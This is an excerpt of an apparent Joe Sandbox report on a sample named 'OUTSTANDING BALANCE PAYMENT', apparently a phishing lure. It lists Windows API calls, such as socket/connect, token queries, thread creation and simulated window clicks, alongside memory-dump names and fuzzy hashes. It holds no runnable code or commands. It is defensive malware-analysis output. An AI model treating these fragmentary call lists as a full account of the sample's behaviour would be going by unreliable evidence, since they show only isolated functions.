                                                          • Instruction Fuzzy Hash: B3415B35604119BFCF159F64C884FE9FBF4FB05324F20839AE86996290DB30A994DFA1
                                                          APIs
                                                          • GetWindowRect.USER32(?,?), ref: 00B9B369
                                                          • PostMessageW.USER32(?,00000201,00000001), ref: 00B9B413
                                                          • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00B9B41B
                                                          • PostMessageW.USER32(?,00000202,00000000), ref: 00B9B429
                                                          • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00B9B431
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: MessagePostSleep$RectWindow
                                                          • String ID:
                                                          • API String ID: 3382505437-0
                                                          • Opcode ID: 592fdfa4b5db87e99072f1733e8c5f341f7abacfa41b7657c2bb76930eb53e57
                                                          • Instruction ID: 21dccd8436979630fc6dbbdb64ab5375f4e07c8ca0d5a26159f93117421ae0b6
                                                          • Opcode Fuzzy Hash: 592fdfa4b5db87e99072f1733e8c5f341f7abacfa41b7657c2bb76930eb53e57
                                                          • Instruction Fuzzy Hash: 6231DF71904259EFDF04CFA8EE8DA9E3BB5EB04315F104269F921AB2D1C7B09914DB91
                                                          APIs
                                                          • IsWindowVisible.USER32(?), ref: 00B9DBD7
                                                          • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00B9DBF4
                                                          • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00B9DC2C
                                                          • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00B9DC52
                                                          • _wcsstr.LIBCMT ref: 00B9DC5C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                          • String ID:
                                                          • API String ID: 3902887630-0
                                                          • Opcode ID: 6393c120ffc72bf53d8a92e737df5919950c4edc66a588d4d8c905d0cbe66394
                                                          • Instruction ID: f8ba9ee636c2ff8ce19f55ede64e959848ebc1e7ee9db728fa7f2283d3331594
                                                          • Opcode Fuzzy Hash: 6393c120ffc72bf53d8a92e737df5919950c4edc66a588d4d8c905d0cbe66394
                                                          • Instruction Fuzzy Hash: 9D21BE72204244BBEF159B2ADC89E7A7BE9DF45760B1080B9F8099A191EAA19841D6A0
                                                          APIs
                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00B9BC90
                                                          • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00B9BCC2
                                                          • __itow.LIBCMT ref: 00B9BCDA
                                                          • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00B9BD00
                                                          • __itow.LIBCMT ref: 00B9BD11
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$__itow
                                                          • String ID:
                                                          • API String ID: 3379773720-0
                                                          • Opcode ID: 92232a7ee691b52e669e5716b2b25fed1d1cd465be63f4b15608398c195a7c2f
                                                          • Instruction ID: a356dd3b6e80e9e0d5b738b4e2000c9692e771f07c59fa333b236c7a475e5e55
                                                          • Opcode Fuzzy Hash: 92232a7ee691b52e669e5716b2b25fed1d1cd465be63f4b15608398c195a7c2f
                                                          • Instruction Fuzzy Hash: 1221C6356002187BDF20AA699D86FEE7BE9EF5A710F1014B4F905EB181DB708D4587E1
                                                          APIs
                                                            • Part of subcall function 00B650E6: _wcsncpy.LIBCMT ref: 00B650FA
                                                          • GetFileAttributesW.KERNEL32(?,?,?,?,00BA60C3), ref: 00BA6369
                                                          • GetLastError.KERNEL32(?,?,?,00BA60C3), ref: 00BA6374
                                                          • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,00BA60C3), ref: 00BA6388
                                                          • _wcsrchr.LIBCMT ref: 00BA63AA
                                                            • Part of subcall function 00BA6318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,00BA60C3), ref: 00BA63E0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                                          • String ID:
                                                          • API String ID: 3633006590-0
                                                          • Opcode ID: ece4e16e965bea86cabcf15052c0c0b50fe1709477aef4101c2af74575a7a568
                                                          • Instruction ID: f48d91948d7c3d5d2a254cbd5b6b18a14a17918c53674b41815aeb5fbad42062
                                                          • Opcode Fuzzy Hash: ece4e16e965bea86cabcf15052c0c0b50fe1709477aef4101c2af74575a7a568
                                                          • Instruction Fuzzy Hash: 832108715082158ADF15AB7C9C92FEE23ECEF17360F1844E9F115D70D0EFA0D9868A59
                                                          APIs
                                                            • Part of subcall function 00BBA82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 00BBA84E
                                                          • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00BB8BD3
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00BB8BE2
                                                          • connect.WSOCK32(00000000,?,00000010), ref: 00BB8BFE
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: ErrorLastconnectinet_addrsocket
                                                          • String ID:
                                                          • API String ID: 3701255441-0
                                                          • Opcode ID: 75eb2651d94274730802e4f432ae34940836f4ad1837616ba44480c318bba1ee
                                                          • Instruction ID: 8591f2c39309c4bc91a74c46df8aa57385b95a4e9a4eeea829a9f84a0273ef45
                                                          • Opcode Fuzzy Hash: 75eb2651d94274730802e4f432ae34940836f4ad1837616ba44480c318bba1ee
                                                          • Instruction Fuzzy Hash: FC218E712002149FDB10AF68CD85BBE77EDEF48710F048499F916AB292CFB4EC018B51
                                                          APIs
                                                          • IsWindow.USER32(00000000), ref: 00BB8441
                                                          • GetForegroundWindow.USER32 ref: 00BB8458
                                                          • GetDC.USER32(00000000), ref: 00BB8494
                                                          • GetPixel.GDI32(00000000,?,00000003), ref: 00BB84A0
                                                          • ReleaseDC.USER32(00000000,00000003), ref: 00BB84DB
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Window$ForegroundPixelRelease
                                                          • String ID:
                                                          • API String ID: 4156661090-0
                                                          • Opcode ID: e5f22667573da60daaccc183715e6b86180134be17db32c58a161ad0e45c9f0d
                                                          • Instruction ID: bede609e06c8f2f33eb142f8fcbccb37ebc2f6029d7c7e1170600c20b1051f43
                                                          • Opcode Fuzzy Hash: e5f22667573da60daaccc183715e6b86180134be17db32c58a161ad0e45c9f0d
                                                          • Instruction Fuzzy Hash: 90215475A00204AFD710DFA4D995AAEB7E9EF48301F0488B9E8599B352DFB4ED44CB50
                                                          APIs
                                                          • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00B7AFE3
                                                          • SelectObject.GDI32(?,00000000), ref: 00B7AFF2
                                                          • BeginPath.GDI32(?), ref: 00B7B009
                                                          • SelectObject.GDI32(?,00000000), ref: 00B7B033
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: ObjectSelect$BeginCreatePath
                                                          • String ID:
                                                          • API String ID: 3225163088-0
                                                          • Opcode ID: d4b9810c03e5e22248d4fb154b40ae483fcbef5bdee8c01a0b1828bb37df6758
                                                          • Instruction ID: fb9cae7a493d8fbe21058950a27c020f9a2ccbc1932faeb9b79dfbf453c51e2b
                                                          • Opcode Fuzzy Hash: d4b9810c03e5e22248d4fb154b40ae483fcbef5bdee8c01a0b1828bb37df6758
                                                          • Instruction Fuzzy Hash: 4A217475810349EFDB21DF55EC84F9E7BA9F720355F18825AF8359A5A0D3704842CF91
                                                          APIs
                                                          • __calloc_crt.LIBCMT ref: 00B821A9
                                                          • CreateThread.KERNEL32(?,?,00B822DF,00000000,?,?), ref: 00B821ED
                                                          • GetLastError.KERNEL32 ref: 00B821F7
                                                          • _free.LIBCMT ref: 00B82200
                                                          • __dosmaperr.LIBCMT ref: 00B8220B
                                                            • Part of subcall function 00B87C0E: __getptd_noexit.LIBCMT ref: 00B87C0E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                                          • String ID:
                                                          • API String ID: 2664167353-0
                                                          • Opcode ID: 87d2c0bcc96edb34ce53f6373f593170e5abc826653fecabf97f6756ebd01bc0
                                                          • Instruction ID: ffa1eab08c19c6cc3af6d2c6629a8950db71a4178be91a908845e7eb7eb829f3
                                                          • Opcode Fuzzy Hash: 87d2c0bcc96edb34ce53f6373f593170e5abc826653fecabf97f6756ebd01bc0
                                                          • Instruction Fuzzy Hash: F611E132148346AFAB11BFA4DC41DAB3BD8EF04764B2004A9F9249B1B1EF71D811CBA0
                                                          APIs
                                                          • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00B9ABD7
                                                          • GetLastError.KERNEL32(?,00B9A69F,?,?,?), ref: 00B9ABE1
                                                          • GetProcessHeap.KERNEL32(00000008,?,?,00B9A69F,?,?,?), ref: 00B9ABF0
                                                          • HeapAlloc.KERNEL32(00000000,?,00B9A69F,?,?,?), ref: 00B9ABF7
                                                          • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00B9AC0E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                          • String ID:
                                                          • API String ID: 842720411-0
                                                          • Opcode ID: 3690b934ffa42b5eafa680fc81033f90df5e49f8a9e9a6652c051350c2c9f745
                                                          • Instruction ID: 72267dc5ce53a5865d12a83ae88e5a7e68466148a1458c1478bb6908e74da59b
                                                          • Opcode Fuzzy Hash: 3690b934ffa42b5eafa680fc81033f90df5e49f8a9e9a6652c051350c2c9f745
                                                          • Instruction Fuzzy Hash: 3F011971200244BFDF104FA9DC88DAB3FBDEF8A7557104469F945DB260DAB19C40CBA1
                                                          APIs
                                                          • CLSIDFromProgID.OLE32 ref: 00B99ADC
                                                          • ProgIDFromCLSID.OLE32(?,00000000), ref: 00B99AF7
                                                          • lstrcmpiW.KERNEL32(?,00000000), ref: 00B99B05
                                                          • CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00B99B15
                                                          • CLSIDFromString.OLE32(?,?), ref: 00B99B21
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: From$Prog$FreeStringTasklstrcmpi
                                                          • String ID:
                                                          • API String ID: 3897988419-0
                                                          • Opcode ID: a4fb44b3247fd862e969ff9bdfeeb56655811aacc8798c419ecbf5379bc2c8bf
                                                          • Instruction ID: 8dd72cb62edee102be1bcc7b96cd39c718124765f07ab7de0346bb5bb16d3660
                                                          • Opcode Fuzzy Hash: a4fb44b3247fd862e969ff9bdfeeb56655811aacc8798c419ecbf5379bc2c8bf
                                                          • Instruction Fuzzy Hash: C8015676600218AFDB104F68EC84BAABBEDEF44752F148078F909DA210DBB4DD009BA0
                                                          APIs
                                                          • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00BA7A74
                                                          • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00BA7A82
                                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00BA7A8A
                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00BA7A94
                                                          • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00BA7AD0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: PerformanceQuery$CounterSleep$Frequency
                                                          • String ID:
                                                          • API String ID: 2833360925-0
                                                          • Opcode ID: 1333f1fd3a81fb7c3136c16ada1497b0df0143b1a3958bf7b0a87fd82b0b65bd
                                                          • Instruction ID: 8c5dc1023c9c5c3ae5326a1e5277b51da7913c90db49556b20941b5ce8651749
                                                          • Opcode Fuzzy Hash: 1333f1fd3a81fb7c3136c16ada1497b0df0143b1a3958bf7b0a87fd82b0b65bd
                                                          • Instruction Fuzzy Hash: 6F012935D4C619EBCF00AFE4DC99ADDBBB8FF0A711F004595E502B6250DF70965087A1
                                                          APIs
                                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00B9AADA
                                                          • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00B9AAE4
                                                          • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00B9AAF3
                                                          • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00B9AAFA
                                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00B9AB10
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                                          • String ID:
                                                          • API String ID: 44706859-0
                                                          • Opcode ID: 5fe81c6534405de653732ff6e659ae4289126c734f150e45b1587b9e31dd68e0
                                                          • Instruction ID: 09832c5fa0f003b89a7078ad1628e7be06e7113eff1fdd50e03b8401f3f0c234
                                                          • Opcode Fuzzy Hash: 5fe81c6534405de653732ff6e659ae4289126c734f150e45b1587b9e31dd68e0
                                                          • Instruction Fuzzy Hash: E3F062712002486FEB111FA4ECC8F673BADFF45754F004179F941DB190CAA09D01CBA1
                                                          APIs
                                                          • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00B9AA79
                                                          • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00B9AA83
                                                          • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00B9AA92
                                                          • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00B9AA99
                                                          • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00B9AAAF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                                          • String ID:
                                                          • API String ID: 44706859-0
                                                          • Opcode ID: 9c18b54a5cefc77413ba240c8ac4ffd2420bca00124c1cbd3ce9a594d94f982b
                                                          • Instruction ID: 88247364c940401b14c84186136af276dedab6770630b4c11027a1db2233ba1c
                                                          • Opcode Fuzzy Hash: 9c18b54a5cefc77413ba240c8ac4ffd2420bca00124c1cbd3ce9a594d94f982b
                                                          • Instruction Fuzzy Hash: 94F04971200244AFEB115FA5AC89EAB3BACFF4A754F040569F941DB1A0DAA09C41CAA2
                                                          APIs
                                                          • GetDlgItem.USER32(?,000003E9), ref: 00B9EC94
                                                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 00B9ECAB
                                                          • MessageBeep.USER32(00000000), ref: 00B9ECC3
                                                          • KillTimer.USER32(?,0000040A), ref: 00B9ECDF
                                                          • EndDialog.USER32(?,00000001), ref: 00B9ECF9
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                          • String ID:
                                                          • API String ID: 3741023627-0
                                                          • Opcode ID: 6cd6f6c1da28284a54c357567e24345904749870e9be9c3b147e97bd679a0426
                                                          • Instruction ID: 17c3a21a70de0e3fab22d1dca6d88949a7909b53d3f9fd45432256514e48784f
                                                          • Opcode Fuzzy Hash: 6cd6f6c1da28284a54c357567e24345904749870e9be9c3b147e97bd679a0426
                                                          • Instruction Fuzzy Hash: C5018130500744ABEF349B50DE8EB967BF8FB10705F0009A9B593AA4E0DBF4EA44CB40
                                                          APIs
                                                          • EndPath.GDI32(?), ref: 00B7B0BA
                                                          • StrokeAndFillPath.GDI32(?,?,00BDE680,00000000,?,?,?), ref: 00B7B0D6
                                                          • SelectObject.GDI32(?,00000000), ref: 00B7B0E9
                                                          • DeleteObject.GDI32 ref: 00B7B0FC
                                                          • StrokePath.GDI32(?), ref: 00B7B117
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Path$ObjectStroke$DeleteFillSelect
                                                          • String ID:
                                                          • API String ID: 2625713937-0
                                                          • Opcode ID: a46a8cd5b5e39ab2faa6b64a71349578ddcf6f889accb24db62cdaafb910a439
                                                          • Instruction ID: f4c0873b3c7b0c6b877b9a51d720cb33d3720013d6969af3c2467acded9f2453
                                                          • Opcode Fuzzy Hash: a46a8cd5b5e39ab2faa6b64a71349578ddcf6f889accb24db62cdaafb910a439
                                                          • Instruction Fuzzy Hash: A2F01934020248EFCB219F65EC4DB5C3BA5E720362F0C8355F829998F1CB718956DF50
                                                          APIs
                                                          • CoInitialize.OLE32(00000000), ref: 00BAF2DA
                                                          • CoCreateInstance.OLE32(00BEDA7C,00000000,00000001,00BED8EC,?), ref: 00BAF2F2
                                                          • CoUninitialize.OLE32 ref: 00BAF555
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
